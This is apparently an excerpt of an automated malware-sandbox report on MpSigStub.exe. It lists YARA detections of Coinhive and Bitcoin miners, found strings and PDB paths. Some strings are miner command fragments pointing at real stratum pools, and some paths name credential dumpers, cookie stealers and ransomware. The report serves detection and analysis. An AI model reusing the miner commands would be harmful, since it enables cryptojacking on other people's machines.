Source: Yara match	File source: 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18341553900.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18330244639.00000138BD776000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18306268361.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18353734046.00000138BDA90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18300587499.00000138BE28E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18348013322.00000138BE8D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18289807011.00000138BEB27000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18321311969.00000138BE145000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18305060553.00000138BDA90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18320434515.00000138BD905000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18351208505.00000138BD776000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18315232073.00000138BDD67000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Coinhive miner

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bcf081b6.67.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd223b1a.148.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bdac8e06.63.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bdb3329f.123.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcaa73fd.109.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be8f860a.191.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be8fa80e.190.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd223b1a.197.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd4f6df4.69.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bde3d286.171.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bde3d286.84.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcaa4da9.108.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd193eb1.195.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce283a.74.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd19185d.194.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be8f860a.87.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd223b1a.220.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bdac8e06.213.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd223b1a.210.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bdac8e06.95.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcf08dba.68.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcd0731e.140.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce283a.167.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce32d4.72.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bde3d286.107.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be8fa80e.86.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce2d87.168.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce32d4.166.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce2d87.73.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bceeeac2.66.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18293544646.00000138BD8C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18346820069.00000138BE12C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18338362697.00000138BCE4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18345351380.00000138BE66C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18329040392.00000138BCB04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18415619805.00000138BD881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18344277872.00000138BE12C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18409070283.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18417573092.00000138BD8B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18297604848.00000138BD4A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18410085130.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18408563136.00000138BD8B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18352805869.00000138BD221000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18418537892.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18324581744.00000138BDC1C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18423541232.00000138BD8B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18358332585.00000138BD221000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18424893452.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18338726635.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18330858645.00000138BE45C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18318886682.00000138BE45C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18322216000.00000138BDE5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18342357735.00000138BDE5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18424078658.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18409582995.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18341553900.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18306680829.00000138BD4FA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18342492638.00000138BE45C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18319503784.00000138BE66C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18418142617.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18323286323.00000138BCB04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18306268361.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18348013322.00000138BE8D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18291761539.00000138BCE4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18289807011.00000138BEB27000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18317087585.00000138BCA04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18418975958.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18306077924.00000138BCEEA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18349361933.00000138BD221000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected BitCoin Miner

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18342844275.00000138BE522000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18332072554.00000138BE522000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18354111280.00000138BE522000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Found strings related to Crypto-Mining

Show sources

Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: -o stratum+tcp://mine.moneropool.com:3333 -t 0 -u
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: pools.txt
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: window.exe-acryptonight-ostratum+tcp://monerohash.com:2222-u
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: href="https://platform.jsecoin.com/?lander=1&utm_source=referral&utm_campaign=aff'
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: E:\CryptoNight\bitmonero-master\src\miner\Release\Crypto.pdb
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: -o stratum+tcp://mine.moneropool.com:3333 -t 0 -u
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: xmrminer
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: XMR-Stak-CPU mining software, CPU Version.
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: -o stratum+tcp://mine.moneropool.com:3333 -t 0 -u
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: \NsCpuCNMiner64.exe
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: \NsCpuCNMiner64.exe
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: pool.minexmr.com
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: XMRig 2.15.1-beta

Source:	Binary string: ASAM\original\delfiletype\delfiletype\obj\Release\delfiletype.pdb source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp
Source:	Binary string: \Release\runner.pdb source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp
Source:	Binary string: Release\arc_2010.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: oyvmhvtgei\bmjc\fee.pdb source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp
Source:	Binary string: \natchat-master\x64\Release\natchat.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: c:\1\rich\look\80\24\Famous\35\72\special\22\melody.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: main\payload\payload.x86.pdb source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp
Source:	Binary string: CFy92ROzKls\ro\HwtAF.pdb source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp
Source:	Binary string: -:\MySpys\chrome_cookie_view\Release\crome.pdb source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp
Source:	Binary string: cts\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp
Source:	Binary string: .C:\SlackDismort\third\Release\SlackDismort.pdbat source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: *.pdb.\|!\binplace.exe source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp
Source:	Binary string: msmdsrv.pdb source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp
Source:	Binary string: he#@1.Pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: heerhWHW#@1wHJnERbRW.Pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: LMIGuardianSvc.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: \Release\gogodele.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: \\Desktop\\.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: N%Tray Me !.*\\Release\\Tray Me !\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: 0\Adobe Reader.pdb source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp
Source:	Binary string: \bin\DownloaderExe.pdb source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp
Source:	Binary string: SpeedNewASK\Debug\spdfrmon.pdb source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp
Source:	Binary string: \release\LSASecretsDump.pdb source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp
Source:	Binary string: PD:\projects\new_Clicker\SIV\original\daemon\NewClieckerDll\Release\SIVUpdate.pdb] source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp
Source:	Binary string: \i386\iSafeKrnlR3.pdb source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp
Source:	Binary string: sctasks.pdbd source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\find\objfre\i386\find.pdb source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp
Source:	Binary string: ZUsers\Admin\Documents\Visual Studio 2015\Projects\Cryptor2.0 Simple\Release\Cryptor2.0.pdba source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp
Source:	Binary string: \WinCbt\Release\WinCbt.pdb source: MpSigStub.exe, 00000026.00000003.18325799879.00000138BCB89000.00000004.00000001.sdmp
Source:	Binary string: @C:\Users\AverageGoose\source\repos\GooseLab\Release\GooseLab.pdb source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: usp10.pdb source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: :b.ProgramISLNetworkStart_win32.0\Release\launch_normal.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: g711codc.pdb3 source: MpSigStub.exe, 00000026.00000003.18345017281.00000138BCDCB000.00000004.00000001.sdmp
Source:	Binary string: reg.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: Ransomware.pdbxN source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: -GMGameStart\bin\release_static\GMUnPacker.pdba source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: \SearchProtect\Bin\Release\ProtectService.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: \x64\release\shell.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: hWEHW#@HJERKJERJER^$.Pdb~ source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: mgr.pdb source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp
Source:	Binary string: \Release\ComBroadcaster.pdb source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp
Source:	Binary string: b-- b3: bs: bue b1f bss b5+(b---b51-b74-bd6-bf8-bbf-ban-bot-bne.bog.bck.bpk.bm.bup.b.s.but.be /be10b420b180bc01bd31bb91b2c1b-b2b6f2b443b683b7-4bd-4by24b994b8a4b,c4b0c4b{65bd85b-95bfa5bgg5b5j5bd96b2c6bhv6be-7b207bf27b-47b077be87b1a7b4f7b528bi38b478b-88b5-9b7f9b3n9but:bg,?bhi_btn_bio_bro_bbs_bet_b: ab86abs_ab-aab5babgbab.cabadabrdabffabciabgrab[tabstab{tabiuab.wab/wab1-bbc-bb59bb89bbjabbffbbtgbb#jbbcobbcsbbbubb26cba8cb4bcb6ecb4fcbyhcbdmcbcpcbipcb-tcb.db</dbe0db27dbpadbbbdbccdb\ddbbddb6edbmodboodb.pdbrrdb-4ebhbeb\debhgebehebtiebklebulebomebjoeb.rebirebprebosebrvebrwebmzeb source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp
Source:	Binary string: bot.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: \\UniversalOrchestratorPrivEscPoc\\Release\\UniversalOrchestratorPrivEscPoc\.pdb source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: comp.pdbd source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp
Source:	Binary string: \Dolphin.pdb source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp
Source:	Binary string: 'C:\postmaster\merge\Peasants\Billy.pdb] source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp
Source:	Binary string: c:\Documents and Settings\Administrator\My Documents\Visual Studio Projects\EASZZCDFR\Release\EASZZCDFR.pdb source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp
Source:	Binary string: -C:\backward\inch\enumeration\Atmel\neces.pdb source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp
Source:	Binary string: KF.+:\\Projects\\Crypt\\Stub2005\\Stub2005\\Stub\\Stub\\Release\\.*.pdb source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp
Source:	Binary string: Ivan\Documents\generic_exe\Release\BHO.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: \CCC\obj\Debug\CCC.pdb source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: WhjrkehLkpe;rltjhpow;elkrjjklWEKL#.pdb] source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: EC:\Projects\Docwize\cUniFunctions\obj\DocwizeClient\cUniFunctions.pdbx source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp
Source:	Binary string: .+:\\src\\tcrypt\\Release\\s_(high\|low).pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-io-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: WanNengWB\WBUpd32.pdb source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp
Source:	Binary string: CryptoService.pdb source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp
Source:	Binary string: msasn1.pdb source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp
Source:	Binary string: Asource\repos\Coronavirus1\Coronavirus1\obj\Debug\Coronavirus1.pdb] source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: ,\NetGuy_Explorer\Release\NetGuy_Explorer.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: \TMain\Release\TSvr.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: ,T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: L%D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: \SearchProtect\bin\Release\HPNotify.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: c:\RPCInstall\Release\RPCInstall.pdb source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp
Source:	Binary string: Release DlpHook\Proxy.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: $\SuperLight\release\MfcDllServer.pdba source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: $\Season\Wife_low\531\Quart\table.pdb source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp
Source:	Binary string: \Sample\Release\CNetworking.pdb source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp
Source:	Binary string: \BypassUac\branches\Download\build\Release\service.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: MC:\Users\wizzlabs\source\repos\ConsoleMap\ConsoleMap\obj\Release\Ehssassi.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: OC:\Users\hoogle168\Desktop\2008Projects\NewCoreCtrl08\Release\NewCoreCtrl08.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
